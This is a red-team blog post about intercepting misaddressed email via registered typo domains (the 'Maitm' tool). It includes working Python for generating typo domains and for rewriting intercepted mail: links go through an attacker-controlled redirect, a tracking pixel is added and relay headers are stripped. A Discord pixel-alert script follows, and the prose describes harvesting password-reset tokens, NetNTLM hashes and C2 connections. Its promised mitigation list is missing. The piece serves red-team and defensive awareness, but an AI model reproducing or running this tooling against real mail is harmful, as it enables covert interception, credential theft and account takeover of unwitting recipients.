In the chilly month of December 2023, my colleagues Jason (@BreakerOfSigns), Szymon (@TH3_GOAT_FARM3R) and I (@felmoltor) were on a red team engagement. This one was tough, but we had fun. We had to be a bit more creative than I am used to, and two interesting things came out of it that are worth sharing:
I cannot speak in the first person about the physical break-in beyond praising the excellent social engineering skills of both of my colleagues, but I can talk about Mail-in-the-Middle.
First, let me explain what Mail-in-the-Middle is and how we approached it.
The idea is simple: take advantage of the typos people make when they enter email addresses. If we position ourselves between the sender of an email (be it a person or a system) and the legitimate recipient, we may be able to capture plenty of information about the business, including personally identifiable information, email verification processes, etc. This scenario is effectively a Person-in-the-Middle (PiTM), but for email communications.
Some examples of how being positioned in the middle of email communications could be useful include:
In summary, doing this would be similar to receiving an Amazon package wrongly delivered to you, swapping the Rolex inside for a Casio, repackaging it, and leaving the parcel on your neighbour's doorstep (hoping they don't notice).
The original idea of intercepting mail this way manually was not ours (Szymon, Jason or Felipe); it was passed down to us from previous generations of SensePost (thank you Willem), and has probably been used by many others out there. What we are presenting here is an improvement on the process and its automation.
Back to the point, to achieve a Mail-in-the-Middle position, there are three basic steps:
I like to call these "Stranded Emails", just because I am a fan of Death Stranding and, not being a native English speaker, I make up words to sound like an intellectual.
The architecture of this setup is illustrated in the diagram below:
The green envelope is the original email sent to the wrong domain (mircosoft.com). The handsome hacker catches that email, extracts any sensitive information it contains, modifies it if needed and forwards it on to the intended recipient.
All this sounds a bit cumbersome to do manually. This is where the Mail-in-the-Middle tool, which automates the process, can help.
Let’s dig into how to set up the environment and use the tool.
As mentioned before, registering domains that are typos of the target's domain (mostly the domains you would end up at if you fat-fingered an email address) is key. Tools such as dnstwist can help you discover good candidates. For example, if the target were mydomain.com, you would register domains like mydoain.com, mydomian.com or mdyomian.com.
Once we have registered a good number of these domains, we point the MX records of all of them at our mail server. Following our earlier example, querying the MX record of one of the domains with dig would return something like the following (if you are on the blue team and suspect something odd is going on, checking the MX records of typos of your own domain is a good place to start):
$ dig mydoain.com mx +short
10 mail.attacker.com.
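The candidate domains above are all single-keystroke errors. The script below is an added example (it is neither Maitm's nor dnstwist's code) that generates the four errors behind most mistyped addresses: a missed key, two keys swapped, a key pressed twice and a neighbouring key hit instead. The QWERTY adjacency map is an assumption about the sender's keyboard. As the attacker you would hand the list to a registrar; as the defender you would feed it to dig and look for MX records you do not own.

```python
"""Fat-finger typo candidates for a target domain (added example)."""
import re

# Neighbouring keys on a QWERTY layout. Assumption: the sender types on one.
QWERTY = {
    "q": "wa", "w": "qes", "e": "wrd", "r": "etf", "t": "ryg", "y": "tuh",
    "u": "yij", "i": "uok", "o": "ipl", "p": "ol",
    "a": "qsz", "s": "awdxz", "d": "sefcx", "f": "drgvc", "g": "fthbv",
    "h": "gyjnb", "j": "hukmn", "k": "jilm", "l": "kop",
    "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb", "b": "vghn",
    "n": "bhjm", "m": "njk",
}
# A registrable DNS label: letters, digits and inner hyphens, 1-63 chars.
LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def omissions(s):
    """One key missed: "mydomain" -> "mydoain"."""
    return {s[:i] + s[i + 1:] for i in range(len(s))}


def transpositions(s):
    """Two adjacent keys swapped: "mydomain" -> "mydomian"."""
    return {s[:i] + s[i + 1] + s[i] + s[i + 2:] for i in range(len(s) - 1)}


def repetitions(s):
    """One key pressed twice: "mydomain" -> "mydommain"."""
    return {s[:i] + s[i] + s[i:] for i in range(len(s))}


def replacements(s):
    """A neighbouring key hit instead: "mydomain" -> "mydimain"."""
    return {s[:i] + n + s[i + 1:]
            for i, c in enumerate(s) for n in QWERTY.get(c, "")}


def typo_domains(domain):
    """Sorted single-error typos of the first label, with the suffix kept."""
    label, dot, rest = domain.lower().partition(".")
    candidates = (omissions(label) | transpositions(label)
                  | repetitions(label) | replacements(label))
    candidates.discard(label)            # the real domain is not a typo
    return sorted(c + dot + rest for c in candidates if LABEL.match(c))


if __name__ == "__main__":
    for d in typo_domains("mydomain.com"):
        print(d)
```

Pipe the output to `dig +short mx` one domain at a time and anything that answers with a mail server you do not recognise deserves a closer look.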
Now, configure a catch-all rule on the mail server to forward any email addressed to a non-existent recipient to a single trap mailbox, for example [email protected].
With a catch-all configured, if I open our server's webmail I usually see plenty of rubbish and spam clogging the inbox. This is a good sign: the catch-all rule is working. You can expect roughly 5% of these emails to be useful (that is, not spam).
The objective of Maitm is to reduce that workload by automating the delivery of spear-phishing style campaigns at scale.
The main ingredients of the tool are a handful of imap-tools, a pinch of discord-webhook and a spoonful of BeautifulSoup4. Mix all this magic in a hot pot and the attacker can rely on a script to modify emails and forward them to the intended users automatically, all while they relax:
Simply put, the script is an infinite loop with the following logic:
Depending on the configuration you have set, the flow should look similar to the following:
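To make the loop body concrete, here is the forwarding step written out as an added example; it is not Maitm's code and uses only the standard library where Maitm uses BeautifulSoup4. A message that landed on a typo'd domain is (1) re-addressed to the intended recipient, (2) has every http(s) link in its HTML and plain-text bodies swapped for a redirect through a host we control, remembering the original so the victim can still be sent to the real page, (3) gets a tracking pixel keyed to the message, and (4) loses the headers that would reveal the detour. The domains, the host attacker.example and the sample message are constructed for the example.

```python
"""Forwarding step of a Mail-in-the-Middle setup (added example)."""
import email
import email.policy
import hashlib
import re
from html.parser import HTMLParser

# Assumptions: which typo maps to which real domain, and the host we control.
TYPO_TO_REAL = {"mydoain.com": "mydomain.com", "mircosoft.com": "microsoft.com"}
PHISH_HOST = "https://attacker.example"
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def swap_url(url, mapping):
    """Replace a URL by a redirect through PHISH_HOST; remember the original."""
    token = hashlib.sha256(url.encode()).hexdigest()[:12]
    mapping[token] = url
    return f"{PHISH_HOST}/r/{token}"


class LinkRewriter(HTMLParser):
    """Re-emits the HTML as parsed, rewriting <a href> and adding a pixel."""

    def __init__(self, mapping, msg_id):
        super().__init__(convert_charrefs=False)
        self.out, self.mapping, self.msg_id = [], mapping, msg_id

    def _tag(self, tag, attrs, selfclose):
        parts = []
        for name, value in attrs:
            if tag == "a" and name == "href" and value and URL_RE.fullmatch(value):
                value = swap_url(value, self.mapping)
            parts.append(f' {name}="{value}"' if value is not None else f" {name}")
        self.out.append(f"<{tag}{''.join(parts)}{' /' if selfclose else ''}>")

    def handle_starttag(self, tag, attrs): self._tag(tag, attrs, False)
    def handle_startendtag(self, tag, attrs): self._tag(tag, attrs, True)

    def handle_endtag(self, tag):
        if tag == "body":  # 1x1 pixel, fetched when remote content is shown
            self.out.append(f'<img src="{PHISH_HOST}/p.gif?m={self.msg_id}" '
                            'width="1" height="1">')
        self.out.append(f"</{tag}>")

    def handle_data(self, d): self.out.append(d)
    def handle_entityref(self, n): self.out.append(f"&{n};")
    def handle_charref(self, n): self.out.append(f"&#{n};")
    def handle_decl(self, d): self.out.append(f"<!{d}>")
    def handle_comment(self, d): self.out.append(f"<!--{d}-->")


def reroute(raw):
    """Return (message ready to relay, {token: original url})."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    mapping, msg_id = {}, hashlib.sha256(raw).hexdigest()[:8]
    # (1) fix the mistyped recipient domain so the mail reaches the real person
    fixed = [f"{a.username}@{TYPO_TO_REAL.get(a.domain.lower(), a.domain)}"
             for a in msg["To"].addresses]
    del msg["To"]
    msg["To"] = ", ".join(fixed)
    # (2)+(3) rewrite links in the HTML body and add the pixel
    html = msg.get_body(preferencelist=("html",))
    if html is not None:
        p = LinkRewriter(mapping, msg_id)
        p.feed(html.get_content())
        p.close()
        html.set_content("".join(p.out), subtype="html")
    text = msg.get_body(preferencelist=("plain",))
    if text is not None:  # plain-text body gets the same treatment via regex
        text.set_content(URL_RE.sub(lambda m: swap_url(m.group(0), mapping),
                                    text.get_content()))
    # (4) drop headers that would show the hop through our server
    for h in ("Received", "DKIM-Signature", "ARC-Seal",
              "Authentication-Results", "Message-ID"):
        del msg[h]
    return msg, mapping


# Constructed sample: a password-reset mail sent to the mistyped address.
SAMPLE = b"""Received: from portal.mydomain.com by mx.attacker.example
From: noreply@portal.mydomain.com
To: jane.doe@mydoain.com
Subject: Reset your password
Message-ID: <1234@portal.mydomain.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Hi Jane, reset here: https://portal.mydomain.com/reset?token=abc123
--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Hi Jane,</p>
<p><a href="https://portal.mydomain.com/reset?token=abc123">Reset your password</a></p>
</body></html>
--b1--
"""

if __name__ == "__main__":
    forwarded, links = reroute(SAMPLE)
    print(forwarded.as_string())
    print(links)
```

The returned message is what you hand to smtplib; the token map is what the redirector on PHISH_HOST consults when the victim clicks, so that after you have seen the reset token they still land on the real page.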
Now that you know the general flow and functionality of Maitm, you just need it to run.
To use the script you need to tweak the YAML configuration file (config/config.yml). This file names other files that hold subsets of the configuration, such as auth.yml, filter.yml, typos.yml, injections.yml, etc. By editing these files you can adapt the tool to your needs as described above. For full details on configuring and running the tool, refer to the GitHub project README.
Once configured, there are two ways to run the tool: create a virtual environment with pipenv, or run it via Docker. Using Docker is as easy as executing:
docker build -t maitm .   # Build the image
docker run --rm -ti maitm -h   # Print the help
docker run --rm -ti maitm -c config/config.yml -f -n
When you run Maitm on your server, you should see something like this in the console:
When an email is forwarded and you have configured Discord or Teams, you will receive a message like this when some activity happens:
I also created another script to report hits on a tracking pixel via Discord. For it to work you need to install the Apache mod_forensic module and set the path of the log file the script watches (the LOG_FILE variable). You also need to create a .env file containing the Discord webhook URL in the DISCORD_WEBHOOK variable.
Leave this script running in the background; when a recipient receives an email (and their email client is allowed to display remote content) you will get a hit on your tracking pixel and be notified like this:
If you are lucky, after each of these notifications you will receive a NetNTLM hash on your server and, if the recipient executes your attachment (assuming you have configured one), a new agent connection to your C2 infrastructure.
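The reporting side, as an added example rather than the script shipped with Maitm: mod_forensic writes one line per request arrival of the form `+id|request line|Header:value|...` (with `:` and `|` inside values percent-encoded) and a bare `-id` line when the request finishes. The code below tails that log, keeps only requests for the pixel path, and turns each into the JSON object (`content` field) that a Discord webhook accepts. The pixel path, the X-Forwarded-For header and the log lines are assumptions and constructed samples.

```python
"""Apache mod_forensic log -> Discord alert for tracking-pixel hits (added example)."""
import json
import os
import time
import urllib.parse
import urllib.request

PIXEL_PATH = "/p.gif"   # assumption: where the 1x1 pixel is served

# Constructed sample lines (not real traffic): one pixel request, its
# completion marker, and an unrelated request that must be ignored.
SAMPLE_LOG = [
    "+ZcQ0mX8AAAEAAB3pJxQAAAAA|GET /p.gif?m=7f3a HTTP/1.1"
    "|Host:track.attacker.example%3a8443"
    "|User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) Outlook/16.0"
    "|Accept:image/*|X-Forwarded-For:203.0.113.7",
    "-ZcQ0mX8AAAEAAB3pJxQAAAAA",
    "+ZcQ0mX8AAAEAAB3pJxQAAAAB|GET /favicon.ico HTTP/1.1"
    "|Host:track.attacker.example|User-Agent:curl/8.4.0",
]


def parse_forensic_line(line):
    """Return (id, request line, {header: value}) for a '+' line, else None."""
    if not line.startswith("+"):
        return None                      # '-id' completion lines carry nothing new
    fields = line[1:].rstrip("\n").split("|")
    req_id, request = fields[0], urllib.parse.unquote(fields[1])
    headers = {}
    for field in fields[2:]:
        name, _, value = field.partition(":")
        headers[name.lower()] = urllib.parse.unquote(value)
    return req_id, request, headers


def pixel_hit(parsed):
    """Message id from the pixel query string, or None for any other request."""
    _, request, _ = parsed
    parts = request.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    url = urllib.parse.urlsplit(target)
    if url.path != PIXEL_PATH:
        return None
    return urllib.parse.parse_qs(url.query).get("m", [None])[0]


def build_alert(parsed, msg_id):
    """Discord webhook payload: a JSON object whose 'content' is the message."""
    req_id, request, headers = parsed
    src = headers.get("x-forwarded-for", "unknown")   # assumption: behind a proxy
    return {"content": (f"Pixel hit for message {msg_id} from {src}\n"
                        f"UA: {headers.get('user-agent', '?')}\n"
                        f"Request {req_id}: {request}")}


def notify(payload, webhook_url):
    """POST the payload to the webhook; returns the HTTP status."""
    req = urllib.request.Request(webhook_url, data=json.dumps(payload).encode(),
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def follow(log_file, webhook_url):
    """Tail the forensic log and alert on every pixel request (runs forever)."""
    with open(log_file) as fh:
        fh.seek(0, os.SEEK_END)          # only new hits, not the backlog
        while True:
            line = fh.readline()
            if not line:
                time.sleep(1)
                continue
            parsed = parse_forensic_line(line)
            if parsed and (mid := pixel_hit(parsed)):
                notify(build_alert(parsed, mid), webhook_url)


if __name__ == "__main__":
    follow(os.environ.get("LOG_FILE", "/var/log/apache2/forensic.log"),
           os.environ["DISCORD_WEBHOOK"])
```

Loading the webhook URL from a .env file is left to whatever you already use (python-dotenv, or exporting it in the shell); only the `+` lines are parsed, since the `-id` marker only tells you the request completed.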
When we think about the security implications of typo'd domains, we immediately think of phishing sent from those domains to our business, but we forget about the implications of the emails sent to them.
Setting up infrastructure that catches "stranded emails" is a powerful attack primitive. The emails sent to these domains often contain a trove of sensitive data, including Personally Identifiable Information (PII), details of business infrastructure, meeting invites, bills, etc. Attackers can use this to great effect, for example to complete employee enrolments or password resets on business-owned platforms, effectively leading to account takeovers. In my last red team we had good success with this, and you can almost surely put it into practice in yours as well.
Having a tool handle "stranded email" monitoring, link and attachment replacement and more takes a significant workload off your shoulders, leaving you more time to focus on other aspects of your testing. Also, when the forwarded email arrives quickly (right after the victim clicked that password reset button), it is less suspicious :)
Mitigating these kinds of attacks, from a business perspective, requires a multi-faceted approach. It is not always possible to prevent human error when typing email addresses or registering people in third-party web applications linked to your business. Some procedures and mechanisms to consider include:
Use the tool in your engagements and let me know how it goes.
Happy hunting!